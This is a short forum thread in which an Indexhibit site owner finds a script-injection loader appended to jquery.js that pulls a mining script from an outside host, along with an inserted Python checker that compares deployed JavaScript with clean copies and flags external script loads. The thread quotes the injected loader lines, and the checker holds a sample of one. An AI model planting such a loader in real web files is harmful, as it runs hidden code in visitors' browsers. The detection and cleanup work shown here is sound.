webmine.pro :(

oscarito / 2018-04-12 07:48:42   

Hi!

I have Indexhibit 2.1.5 on my web. I installed the Brave browser, I went to my web to check it and I received this notice: tracker blocked: http: // webmine. pro / lib / crlt. js

I asked my host. They said my website was clean.
I went to isithacked.com. They said my website was clean.
I guessed it would be a mistake by the Brave browser.

But I opened the Safari inspector and I saw that there were three .js files working in my web: jquery, jqueryindexpand (both in my domain), and crlt.js (this one pointing to webmine.pro).

I opened jquery.js via ftp and I see at the end:

  // do stuff with the script
  };
  script.src = "// webmine .pro / lib / crlt .js"
  document.head.appendChild (script);

In the inspector, I also saw something apparently sending info to this web page: sea (dot) directprimal (dot) com :(

I replaced the injected (or whatever) jquery.js file with the original indexhibit jquery.js and the problem seems to be solved; Brave doesn't show trackers blocked in my web, and Safari doesn't show anything strange either.
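A check a site owner could run after a finding like the one in the post above, as an added example that is not part of the thread or of Indexhibit: it compares each deployed .js file with a clean copy unpacked from the release archive and lists any `.src` assignment that points at a host other than your own. The directory layout, the host names and the sample text are constructed assumptions.

```python
import hashlib
import re
from pathlib import Path
from urllib.parse import urlsplit

# Matches `something.src = "//host/..."` or "http(s)://host/..." (dynamic script loaders).
SRC_ASSIGN = re.compile(r"""\.src\s*=\s*["']\s*((?:https?:)?//[^"'\s]+)""", re.I)

# Constructed sample: a library file with a loader appended at the end.
# tracker.example is a placeholder host, not the one named in the thread.
SAMPLE_TAMPERED = (
    "/* library code ... */\n"
    "var script = document.createElement('script');\n"
    'script.src = "//tracker.example/lib/x.js";\n'
    "document.head.appendChild(script);\n"
)

def external_loads(js_text, own_hosts):
    """Return (line_number, host) for each .src assignment to a host not in own_hosts."""
    hits = []
    for number, line in enumerate(js_text.splitlines(), 1):
        for match in SRC_ASSIGN.finditer(line):
            host = urlsplit(match.group(1)).hostname
            if host and host not in own_hosts:
                hits.append((number, host))
    return hits

def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit_js(site_dir, clean_dir, own_hosts):
    """Map each changed or unknown .js file to (status, external loads found in it)."""
    site_dir, clean_dir = Path(site_dir), Path(clean_dir)
    report = {}
    for deployed in sorted(site_dir.rglob("*.js")):
        rel = deployed.relative_to(site_dir).as_posix()
        reference = clean_dir / rel
        if not reference.is_file():
            status = "not in clean copy"
        elif sha256_of(deployed) != sha256_of(reference):
            status = "modified"
        else:
            continue  # byte-identical to the release file
        text = deployed.read_text(encoding="utf-8", errors="replace")
        report[rel] = (status, external_loads(text, own_hosts))
    return report

if __name__ == "__main__":
    print(external_loads(SAMPLE_TAMPERED, {"www.example.org"}))
```

A file reported as "modified" with no external loads still differs from the release copy and deserves a manual diff; the regex only catches the plain `.src = "..."` form.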

Vaska A / 2018-04-12 07:52:08   

When you upgraded to 2.1.5 did you upgrade everything? Including ndxzsite files...

oscarito / 2018-04-12 08:03:34   

I am not 100% sure, Vaska, but I think so: all files in ndxzsite/js folder are dated February 19, 2018...

oscarito / 2018-04-12 08:24:42   

Wait! I searched for the backup of my site that I did before the update to 2.1.5, and the malicious code was already there! So no, it seems that jquery.js was an old pre-2.1.5 file... I guess that's good news.

Vaska A / 2018-04-12 11:45:43   

Yep...and that you had not updated everything. Make sure you have updated all of the /ndxzsite/plugin.jxs_****.php files to the newest versions.

oscarito / 2018-04-12 14:20:48   

Done. Thank you Vaska :)

This thread has been closed, thank you.